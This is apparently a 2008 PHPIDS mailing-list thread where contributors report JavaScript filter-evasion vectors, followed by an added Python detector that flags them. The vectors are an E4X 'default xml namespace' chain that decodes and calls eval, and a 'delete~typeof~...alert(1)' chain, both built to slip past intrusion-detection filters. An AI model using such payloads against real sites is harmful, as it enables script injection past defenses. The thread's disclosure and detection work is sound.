New vector from sla.ckers


Gareth

Sep 1, 2008, 4:34:28 AM
to PHPIDS » Web Application Security 2.0
I've posted it here in case you can't get on sla.ckers:-
http://www.businessinfo.co.uk/labs/phpids/urlvector.php

Mario Heiderich

Sep 1, 2008, 4:36:20 AM
to php...@googlegroups.com
Hi!

Thanks - I wasn't online this weekend so I couldn't fix it yet. Will happen asap ;)

Grx,
.mario


On Mon, Sep 1, 2008 at 10:34 AM, Gareth <gazh...@gmail.com> wrote:

I've posted it here in case you can't get on sla.ckers:-
http://www.businessinfo.co.uk/labs/phpids/urlvector.php




--
_______________________
php-ids.org

.ﻩﻨﺮﻪﺴ

Gareth

Sep 11, 2008, 5:00:48 PM
to PHPIDS » Web Application Security 2.0
This is just beautiful :)
Check out the centrifuge evasion.

http://www.businessinfo.co.uk/labs/phpids/phpids3.html

default xml namespace=toolbar,b=1&&this.atob
default xml namespace=toolbar,e2=b('ZXZhbA')
default xml namespace=toolbar,e=this[toolbar,e2]
default xml namespace=toolbar,y=1&&name
default xml namespace=toolbar
default xml namespace=e(y)

On Sep 1, 9:36 am, "Mario Heiderich" <mario.heider...@googlemail.com> wrote:
> Hi!
>
> Thanks - I wasn't online this weekend so I couldn't fix it yet. Will happen
> asap ;)
>
> Grx,
> .mario
>

Mario Heiderich

Sep 12, 2008, 5:21:32 AM
to php...@googlegroups.com
Pure sweetness - and again almost painful to close this gap ;)

Very nice work!
--
_______________________
php-ids.org

.ﻩﻨﺮﻪﺴ

Gareth

Sep 12, 2008, 5:41:25 AM
to PHPIDS » Web Application Security 2.0
Sniff Sniff

On Sep 12, 10:21 am, "Mario Heiderich"

Mario Heiderich

Sep 12, 2008, 5:46:39 AM
to php...@googlegroups.com
Anyway - I bet E4X has more secrets in stock on how to execute and obfuscate JS ;)
--
_______________________
php-ids.org

.ﻩﻨﺮﻪﺴ

Gareth

Sep 21, 2008, 3:55:09 PM
to PHPIDS » Web Application Security 2.0
Javascript is weird :D

delete~typeof~typeof~typeof~typeof~typeof~typeof~alert(1)

On Sep 12, 10:46 am, "Mario Heiderich"

Mario Heiderich

Sep 24, 2008, 5:08:23 AM
to php...@googlegroups.com
Awesome stuff - and very interesting bug which was uncovered by this vector. Fixed!
--
_______________________
php-ids.org

.ﻩﻨﺮﻪﺴ
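A defender-side illustration, added here and not part of the thread or of the PHPIDS code base: three small heuristics that would have flagged the two vectors Gareth posted above. The first looks for E4X `default xml namespace = <expr>` statements, whose right-hand side runs as an ordinary expression without any of the usual call tokens a filter keys on; the second looks for long chains of prefix unary operators in front of a call; the third decodes quoted base64 fragments such as `'ZXZhbA'` and checks whether the plaintext is a known sink name. The two vector strings are copied from the thread; the regexes, tag names and sink list are my own assumptions, not PHPIDS rules.

```python
import base64
import binascii
import re

# Constructed test inputs: the two vectors from this thread, plus a benign line.
E4X_VECTOR = "\n".join([
    "default xml namespace=toolbar,b=1&&this.atob",
    "default xml namespace=toolbar,e2=b('ZXZhbA')",
    "default xml namespace=toolbar,e=this[toolbar,e2]",
    "default xml namespace=toolbar,y=1&&name",
    "default xml namespace=toolbar",
    "default xml namespace=e(y)",
])
UNARY_VECTOR = "delete~typeof~typeof~typeof~typeof~typeof~typeof~alert(1)"
BENIGN = "var x = typeof y; delete z.q;"

# Heuristic 1 (assumed pattern): E4X default-namespace assignment. The target is
# a keyword sequence, so whatever follows "=" is evaluated as a plain expression.
E4X_DEFAULT_NS = re.compile(r"default\s+xml\s+namespace\s*=", re.IGNORECASE)

# Heuristic 2 (assumed pattern): three or more prefix unary operators directly
# before an identifier call, e.g. delete~typeof~typeof~alert(1).
UNARY_CHAIN = re.compile(
    r"(?:(?:delete|typeof|void|!|~|-|\+)\s*){3,}[A-Za-z_$][\w$]*\s*\("
)

# Heuristic 3: quoted base64-looking literals (possibly unpadded, as atob()
# tolerates) that decode to a sink name. Sink list is an assumption.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{4,}={0,2})['\"]")
SINKS = {"eval", "alert", "Function", "document", "location", "setTimeout"}


def decode_b64_literals(payload: str) -> list[str]:
    """Return the printable plaintexts of every quoted base64 literal in payload."""
    decoded = []
    for match in B64_LITERAL.finditer(payload):
        token = match.group(1)
        padded = token + "=" * (-len(token) % 4)  # restore padding atob() would accept
        try:
            text = base64.b64decode(padded, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64, or not text: skip
        if text.isprintable():
            decoded.append(text)
    return decoded


def scan(payload: str) -> list[str]:
    """Return a sorted list of tags naming the evasion heuristics that fired."""
    tags = set()
    if E4X_DEFAULT_NS.search(payload):
        tags.add("e4x-default-namespace")
    if UNARY_CHAIN.search(payload):
        tags.add("unary-operator-chain")
    if any(text in SINKS for text in decode_b64_literals(payload)):
        tags.add("base64-literal-decodes-to-sink")
    return sorted(tags)


if __name__ == "__main__":
    for label, sample in (("e4x", E4X_VECTOR), ("unary", UNARY_VECTOR), ("benign", BENIGN)):
        print(f"{label:>7}: {scan(sample)}")
```

Decoding the base64 fragment is the part worth keeping even once the regexes are tuned: `'ZXZhbA'` carries no suspicious token on its own, and only its plaintext `eval` ties the E4X vector back to a sink.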